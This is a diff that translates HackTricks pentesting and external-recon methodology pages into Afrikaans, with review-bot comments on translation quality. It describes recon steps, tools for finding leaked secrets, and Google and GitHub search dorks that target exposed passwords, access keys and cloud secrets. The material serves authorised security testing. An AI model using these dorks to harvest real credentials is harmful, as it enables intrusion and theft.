gelyktydig in meer as 80 plakkerswebwerwe te soek. ### Google Dorks -Old but gold google dorks are always useful to find **exposed information that shouldn't be there**. The only problem is that the [**google-hacking-database**](https://www.exploit-db.com/google-hacking-database) contains several **thousands** of possible queries that you cannot run manually. So, you can get your favourite 10 ones or you could use a **tool such as** [**Gorks**](https://github.com/carlospolop/Gorks) **to run them all**. +Ou maar goeie Google Dorks is altyd nuttig om blootgestelde inligting wat nie daar behoort te wees nie, te vind. 
Die enigste probleem is dat die [google-hacking-database](https://www.exploit-db.com/google-hacking-database) verskeie duisende moontlike navrae bevat wat jy nie handmatig kan hardloop nie. Jy kan dus jou gunsteling 10 kies of 'n gereedskap soos [Gorks](https://github.com/carlospolop/Gorks) gebruik om hulle almal uit te voer. -_Note that the tools that expect to run all the database using the regular Google browser will never end as google will block you very very soon._ +Merk op dat die gereedskap wat verwag dat jy die hele databasis met die gewone Google-webblaaier hardloop, nooit sal eindig nie, aangesien Google jou baie baie gou sal blokkeer. -### **Looking for vulnerabilities** +### **Op soek na kwesbaarhede** -If you find **valid leaked** credentials or API tokens, this is a very easy win. +As jy geldige uitgelekte kredensiale of API-tokens vind, is dit 'n baie maklike oorwinning. -## Public Code Vulnerabilities +## Openbare Kodekwesbaarhede -If you found that the company has **open-source code** you can **analyse** it and search for **vulnerabilities** on it. +As jy vind dat die maatskappy oopbronkode het, kan jy dit analiseer en soek na kwesbaarhede daarin. 
-**Depending on the language** there are different **tools** you can use: +Afhanklik van die taal is daar verskillende gereedskap wat jy kan gebruik: {% content-ref url="../../network-services-pentesting/pentesting-web/code-review-tools.md" %} [code-review-tools.md](../../network-services-pentesting/pentesting-web/code-review-tools.md) {% endcontent-ref %} -There are also free services that allow you to **scan public repositories**, such as: +Daar is ook gratis dienste wat jou in staat stel om openbare bewaarplekke te skandeer, soos: -* [**Snyk**](https://app.snyk.io/) +* [Snyk](https://app.snyk.io/) +## [**Pentesting Web Metodologie**](../../network-services-pentesting/pentesting-web/) -## [**Pentesting Web Methodology**](../../network-services-pentesting/pentesting-web/) +Die **meerderheid van die kwesbaarhede** wat deur foutsoekers gevind word, is binne **webtoepassings**, so op hierdie punt wil ek graag praat oor 'n **webtoepassingstoetsmetodologie**, en jy kan [**hierdie inligting hier vind**](../../network-services-pentesting/pentesting-web/). -The **majority of the vulnerabilities** found by bug hunters resides inside **web applications**, so at this point I would like to talk about a **web application testing methodology**, and you can [**find this information here**](../../network-services-pentesting/pentesting-web/). 
+Ek wil ook 'n spesiale vermelding maak van die afdeling [**Web Geoutomatiseerde Skanderings oopbronhulpmiddels**](../../network-services-pentesting/pentesting-web/#automatic-scanners), want alhoewel jy nie moet verwag dat hulle baie sensitiewe kwesbaarhede sal vind nie, is hulle handig om hulle te implementeer in **werkstrome om 'n aanvanklike webinligting te verkry.** -I also want to do a special mention to the section [**Web Automated Scanners open source tools**](../../network-services-pentesting/pentesting-web/#automatic-scanners), as, if you shouldn't expect them to find you very sensitive vulnerabilities, they come handy to implement them on **workflows to have some initial web information.** +## Opsomming -## Recapitulation +> Gelukwens! Op hierdie punt het jy reeds **alle basiese opname** uitgevoer. Ja, dit is basies omdat daar nog baie meer opname gedoen kan word (ons sal later meer truuks sien). -> Congratulations! At this point you have already perform **all the basic enumeration**. Yes, it's basic because a lot more enumeration can be done (will see more tricks later). +Jy het reeds: -So you have already: +1. Al die **maatskappye** binne die omvang gevind +2. Al die **bates** wat aan die maatskappye behoort, gevind (en 'n paar kwesbaarheidsskanderings uitgevoer as dit binne die omvang val) +3. Al die **domeine** wat aan die maatskappye behoort, gevind +4. Al die **subdomeine** van die domeine gevind (enige subdomein-oorgawe?) +5. Al die **IP's** (van en **nie van CDN's**) binne die omvang gevind. +6. Al die **webbedieners** gevind en 'n **skermkiekie** van hulle geneem (enige iets vreemds wat 'n dieper kyk werd is?) +7. Al die **potensiële openbare wolkbates** wat aan die maatskappy behoort, gevind. +8. **E-posse**, **geloofsbriewe-lekke** en **geheimlekkasies** wat jou 'n **groot wen baie maklik** kan gee. +9. **Pentesting van al die webwerwe wat jy gevind het** -1. Found all the **companies** inside the scope -2. 
Found all the **assets** belonging to the companies (and perform some vuln scan if in scope) -3. Found all the **domains** belonging to the companies -4. Found all the **subdomains** of the domains (any subdomain takeover?) -5. Found all the **IPs** (from and **not from CDNs**) inside the scope. -6. Found all the **web servers** and took a **screenshot** of them (anything weird worth a deeper look?) -7. Found all the **potential public cloud assets** belonging to the company. -8. **Emails**, **credentials leaks**, and **secret leaks** that could give you a **big win very easily**. -9. **Pentesting all the webs you found** +## **Volledige Opname Outomatiese Hulpmiddels** -## **Full Recon Automatic Tools** - -There are several tools out there that will perform part of the proposed actions against a given scope. +Daar is verskeie hulpmiddels beskikbaar wat 'n deel van die voorgestelde aksies teen 'n gegewe omvang sal uitvoer. * [**https://github.com/yogeshojha/rengine**](https://github.com/yogeshojha/rengine) * [**https://github.com/j3ssie/Osmedeus**](https://github.com/j3ssie/Osmedeus) * [**https://github.com/six2dez/reconftw**](https://github.com/six2dez/reconftw) -* [**https://github.com/hackerspider1/EchoPwn**](https://github.com/hackerspider1/EchoPwn) - A little old and not updated +* [**https://github.com/hackerspider1/EchoPwn**](https://github.com/hackerspider1/EchoPwn) - 'n Bietjie oud en nie opgedateer nie -## **References** +## **Verwysings** -* All free courses of [**@Jhaddix**](https://twitter.com/Jhaddix) like [**The Bug Hunter's Methodology v4.0 - Recon Edition**](https://www.youtube.com/watch?v=p4JgIu1mceI) +* Alle gratis kursusse van [**@Jhaddix**](https://twitter.com/Jhaddix) soos [**The Bug Hunter's Methodology v4.0 - Recon Edition**](https://www.youtube.com/watch?v=p4JgIu1mceI) \ -**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! 
Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**! +**Bug bounty wenk**: **teken aan** vir **Intigriti**, 'n premium **bug bounty-platform wat deur hackers geskep is, vir hackers**! Sluit vandag by ons aan by [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) en begin om belonings tot **$100,000** te verdien! {% embed url="https://go.intigriti.com/hacktricks" %}
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy in HackTricks wil adverteer** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFT's**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
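Review bot: the term for "credentials" is inconsistent within this file: the `Looking for vulnerabilities` paragraph renders it as `kredensiale` ("As jy geldige uitgelekte kredensiale of API-tokens vind") while recap item 8 uses `geloofsbriewe-lekke`, and pentesting-methodology.md in the same patch uses `legitimasie-inligting` and `Legitieme Inligting`; pick one term and apply it across the PR. The Leakos sentence also drifts from the source: `teen al die teksverskaffings-URL's wat aan hom oorgedra word` does not convey "all the URLs passed to it", which is the point of the sentence; suggest `Leakos kan ook gebruik word om gitleaks te laat loop teen die teks van al die URL's wat daaraan deurgegee word, aangesien webblaaie soms ook geheime bevat.` Minor: `Gelukwens!` in the recap callout is a noun/verb form; `Geluk!` or `Veels geluk!` is the idiomatic interjection for "Congratulations!".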
diff --git a/generic-methodologies-and-resources/external-recon-methodology/github-leaked-secrets.md b/generic-methodologies-and-resources/external-recon-methodology/github-leaked-secrets.md index 677d7fa70..35f04d05b 100644 --- a/generic-methodologies-and-resources/external-recon-methodology/github-leaked-secrets.md +++ b/generic-methodologies-and-resources/external-recon-methodology/github-leaked-secrets.md @@ -2,30 +2,30 @@
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PRs in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
\ -**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**! +**Bug bounty wenk**: **teken aan** vir **Intigriti**, 'n premium **bug bounty-platform geskep deur hackers, vir hackers**! Sluit vandag by ons aan by [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks), en begin verdien belonings tot **$100,000**! {% embed url="https://go.intigriti.com/hacktricks" %} -Now that we have built the list of assets of our scope it's time to search for some OSINT low-hanging fruits. +Nou dat ons die lys van bates in ons omvang gebou het, is dit tyd om te soek na sommige OSINT-laaghangende vrugte. -### Platforms that already searched for leaks +### Platforms wat reeds na lekke gesoek het * [https://trufflesecurity.com/blog/introducing-forager/](https://trufflesecurity.com/blog/introducing-forager/) -### Api keys leaks in github +### Api-sleutellekke in github * [https://github.com/dxa4481/truffleHog](https://github.com/dxa4481/truffleHog) * [https://github.com/gitleaks/gitleaks](https://github.com/gitleaks/gitleaks) @@ -40,7 +40,6 @@ Now that we have built the list of assets of our scope it's time to search for s * [https://github.com/obheda12/GitDorker](https://github.com/obheda12/GitDorker) ### **Dorks** - ```bash ".mlab.com password" "access_key" @@ -322,17 +321,16 @@ GCP SECRET AWS SECRET "private" extension:pgp ``` -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
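Review bot: the hunks `@@ -40,7 +40,6 @@` and `@@ -322,17 +321,16 @@` each drop a blank line (the one between `### **Dorks**` and the opening `bash` fence, and the one after the closing fence) that has nothing to do with the translation, while the heading and fence lines themselves are left untouched; keep the PR limited to text changes and restore those two lines so the dorks block stays visually separated from the heading and from the footer block that follows it.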
diff --git a/generic-methodologies-and-resources/external-recon-methodology/wide-source-code-search.md b/generic-methodologies-and-resources/external-recon-methodology/wide-source-code-search.md index 03816699e..480f006c1 100644 --- a/generic-methodologies-and-resources/external-recon-methodology/wide-source-code-search.md +++ b/generic-methodologies-and-resources/external-recon-methodology/wide-source-code-search.md @@ -1,43 +1,43 @@ -# Wide Source Code Search +# Wydse Bronkode Soektog
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
-The goal of this page is to enumerate **platforms that allow to search for code** (literal or regex) in across thousands/millions of repos in one or more platforms. +Die doel van hierdie bladsy is om **platforms op te som wat soektogte vir kode** (letterlik of regex) in duisende/miljoene opslagplekke op een of meer platforms toelaat. -This helps in several occasions to **search for leaked information** or for **vulnerabilities** patterns. +Dit help in verskeie gevalle om te **soek na uitgelekde inligting** of na **kwesbaarheidspatrone**. -* [**SourceGraph**](https://sourcegraph.com/search): Search in millions of repos. There is a free version and an enterprise version (with 15 days free). It supports regexes. -* [**Github Search**](https://github.com/search): Search across Github. It supports regexes. - * Maybe it's also useful to check also [**Github Code Search**](https://cs.github.com/). -* [**Gitlab Advanced Search**](https://docs.gitlab.com/ee/user/search/advanced\_search.html): Search across Gitlab projects. Support regexes. -* [**SearchCode**](https://searchcode.com/): Search code in millions of projects. +* [**SourceGraph**](https://sourcegraph.com/search): Soek in miljoene opslagplekke. Daar is 'n gratis weergawe en 'n ondernemingsweergawe (met 15 dae gratis). Dit ondersteun regexes. +* [**Github Soektog**](https://github.com/search): Soek deur Github. Dit ondersteun regexes. +* Dit mag ook nuttig wees om ook [**Github Kodesoektog**](https://cs.github.com/) te kyk. +* [**Gitlab Gevorderde Soektog**](https://docs.gitlab.com/ee/user/search/advanced\_search.html): Soek deur Gitlab-projekte. Ondersteun regexes. +* [**SearchCode**](https://searchcode.com/): Soek kode in miljoene projekte. {% hint style="warning" %} -When you look for leaks in a repo and run something like `git log -p` don't forget there might be **other branches with other commits** containing secrets! 
+Wanneer jy na lekke in 'n opslagplek soek en iets soos `git log -p` hardloop, moenie vergeet dat daar dalk **ander takke met ander commits** wat geheime bevat nie! {% endhint %}
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
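Review bot: the sub-bullet under the Github Search item loses its nesting: the source line `    * Maybe it's also useful to check also [**Github Code Search**](https://cs.github.com/).` is indented under the `Github Search` bullet, but `+* Dit mag ook nuttig wees om ook [**Github Kodesoektog**](https://cs.github.com/) te kyk.` is emitted at the top level, which turns a remark about Github Search into a fifth independent platform; re-indent it under the Github item. Also, `Wydse` in the title `# Wydse Bronkode Soektog` is not an Afrikaans word (`Wye Bronkode-soektog` reads naturally), and the warning hint is missing its main verb: it should read `dat daar dalk ander takke met ander commits is wat geheime bevat`.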
diff --git a/generic-methodologies-and-resources/pentesting-methodology.md b/generic-methodologies-and-resources/pentesting-methodology.md index c574cb48d..d2b2fce80 100644 --- a/generic-methodologies-and-resources/pentesting-methodology.md +++ b/generic-methodologies-and-resources/pentesting-methodology.md @@ -1,176 +1,175 @@ -# Pentesting Methodology +# Pentesting Metodologie
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
\ -**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**! +**Bug bounty wenk**: **teken aan** vir **Intigriti**, 'n premium **bug bounty-platform wat deur hackers geskep is, vir hackers**! Sluit vandag by ons aan by [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks), en begin verdien belonings tot **$100,000**! {% embed url="https://go.intigriti.com/hacktricks" %} -## Pentesting Methodology +## Pentesting Metodologie
-_Hacktricks logos designed by_ [_@ppiernacho_](https://www.instagram.com/ppieranacho/)_._ +_Hacktricks-logo's ontwerp deur_ [_@ppiernacho_](https://www.instagram.com/ppieranacho/)_._ -### 0- Physical Attacks +### 0- Fisiese Aanvalle -Do you have **physical access** to the machine that you want to attack? You should read some [**tricks about physical attacks**](../physical-attacks/physical-attacks.md) and others about [**escaping from GUI applications**](../physical-attacks/escaping-from-gui-applications/). +Het jy **fisiese toegang** tot die masjien wat jy wil aanval? Jy moet 'n paar [**truuks oor fisiese aanvalle**](../physical-attacks/physical-attacks.md) en ander oor [**ontsnapping uit GUI-toepassings**](../physical-attacks/escaping-from-gui-applications/) lees. -### 1 - [Discovering hosts inside the network ](pentesting-network/#discovering-hosts)/ [Discovering Assets of the company](external-recon-methodology/) +### 1 - [Ontdekking van gasheer binne die netwerk](pentesting-network/#discovering-hosts)/ [Ontdekking van bates van die maatskappy](external-recon-methodology/) -**Depending** if the **test** you are perform is an **internal or external test** you may be interested on finding **hosts inside the company network** (internal test) or **finding assets of the company on the internet** (external test). +**Afhanklik** van of die **toets** wat jy uitvoer 'n **interne of eksterne toets** is, mag jy belangstel om **gasheerders binne die maatskappy se netwerk** (interne toets) of **bates van die maatskappy op die internet** (eksterne toets) te vind. {% hint style="info" %} -Note that if you are performing an external test, once you manage to obtain access to the internal network of the company you should re-start this guide. +Let daarop dat as jy 'n eksterne toets uitvoer, sodra jy toegang tot die interne netwerk van die maatskappy verkry, moet jy hierdie gids herbegin. 
{% endhint %} -### **2-** [**Having Fun with the network**](pentesting-network/) **(Internal)** +### **2-** [**Pret hê met die netwerk**](pentesting-network/) **(Intern)** -**This section only applies if you are performing an internal test.**\ -Before attacking a host maybe you prefer to **steal some credentials** **from the network** or **sniff** some **data** to learn **passively/actively(MitM)** what can you find inside the network. You can read [**Pentesting Network**](pentesting-network/#sniffing). +**Hierdie afdeling is slegs van toepassing as jy 'n interne toets uitvoer.**\ +Voordat jy 'n gasheer aanval, verkies jy miskien om **sekere legitimasie-inligting** **uit die netwerk** te **steel** of **data** te **sniff** om passief/aktief (MitM) te leer wat jy binne die netwerk kan vind. Jy kan [**Pentesting Network**](pentesting-network/#sniffing) lees. -### 3- [Port Scan - Service discovery](pentesting-network/#scanning-hosts) +### 3- [Poortskandering - Diensontdekking](pentesting-network/#scanning-hosts) -The first thing to do when **looking for vulnerabilities in a host** is to know which **services are running** in which ports. Let's see the[ **basic tools to scan ports of hosts**](pentesting-network/#scanning-hosts). +Die eerste ding wat jy moet doen wanneer jy **kwesbaarhede in 'n gasheer soek**, is om te weet watter **dienste op watter poorte loop**. Kom ons kyk na die [**basiese gereedskap om poorte van gasheerders te skandeer**](pentesting-network/#scanning-hosts). -### **4-** [Searching service version exploits](search-exploits.md) +### **4-** [Soek diensweergawe-exploits](search-exploits.md) -Once you know which services are running, and maybe their version, you have to **search for known vulnerabilities**. Maybe you get lucky and there is a exploit to give you a shell... +Sodra jy weet watter dienste loop, en dalk hul weergawe, moet jy **soek na bekende kwesbaarhede**. Dalk het jy geluk en daar is 'n exploot wat jou 'n skulpskoot kan gee... 
-### **5-** Pentesting Services +### **5-** Pentesting-dienste -If there isn't any fancy exploit for any running service, you should look for **common misconfigurations in each service running.** +As daar geen fantastiese exploot vir enige lopende diens is nie, moet jy kyk vir **algemene verkeerde konfigurasies in elke lopende diens**. -**Inside this book you will find a guide to pentest the most common services** (and others that aren't so common)**. Please, search in the left index the** _**PENTESTING**_ **section** (the services are ordered by their default ports). +**Binne hierdie boek sal jy 'n gids vind om die mees algemene dienste te pentest** (en ander wat nie so algemeen is nie)**. Soek asseblief in die linkerindeks die** _**PENTESTING**_ **afdeling** (die dienste is gerangskik volgens hul verstekpoorte). -**I want to make a special mention of the** [**Pentesting Web**](../network-services-pentesting/pentesting-web/) **part (as it is the most extensive one).**\ -Also, a small guide on how to[ **find known vulnerabilities in software**](search-exploits.md) can be found here. +**Ek wil graag 'n spesiale vermelding maak van die** [**Pentesting Web**](../network-services-pentesting/pentesting-web/) **gedeelte (omdat dit die mees omvattende is).**\ +'n Klein gids oor hoe om [**bekende kwesbaarhede in sagteware te vind**](search-exploits.md) kan hier gevind word. -**If your service is not inside the index, search in Google** for other tutorials and **let me know if you want me to add it.** If you **can't find anything** in Google, perform your **own blind pentesting**, you could start by **connecting to the service, fuzzing it and reading the responses** (if any). 
+**As jou diens nie in die indeks is nie, soek in Google** vir ander tutoriale en **laat weet my as jy wil hê ek moet dit byvoeg.** As jy **niks kan vind** in Google nie, voer jou **eie blinde pentesting** uit, jy kan begin deur **met die diens te verbind, dit te fuzz en die antwoorde te lees** (as daar enige is). -#### 5.1 Automatic Tools +#### 5.1 Outomatiese Gereedskap -There are also several tools that can perform **automatic vulnerabilities assessments**. **I would recommend you to try** [**Legion**](https://github.com/carlospolop/legion)**, which is the tool that I have created and it's based on the notes about pentesting services that you can find in this book.** +Daar is ook verskeie gereedskap wat **outomatiese kwesbaarheidsassesserings** kan uitvoer. **Ek sal aanbeveel dat jy** [**Legion**](https://github.com/carlospolop/legion)** probeer, wat die gereedskap is wat ek geskep het en gebaseer is op die notas oor die pentesting van dienste wat jy in hierdie boek kan vind.** -#### **5.2 Brute-Forcing services** +#### **5.2 Brute-Force-dienste** -In some scenarios a **Brute-Force** could be useful to **compromise** a **service**. [**Find here a CheatSheet of different services brute forcing**](brute-force.md)**.** +In sommige scenario's kan 'n **Brute-Force** nuttig wees om 'n **diens** te **kompromitteer**. [**Vind hier 'n Spiekbrief van verskillende dienste wat Brute-Force gebruik**](brute-force.md)**.** \ -**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!\\ +**Bug bounty wenk**: **teken aan** vir **Intigriti**, 'n premium **bug bounty-platform wat deur hackers geskep is, vir hackers**! 
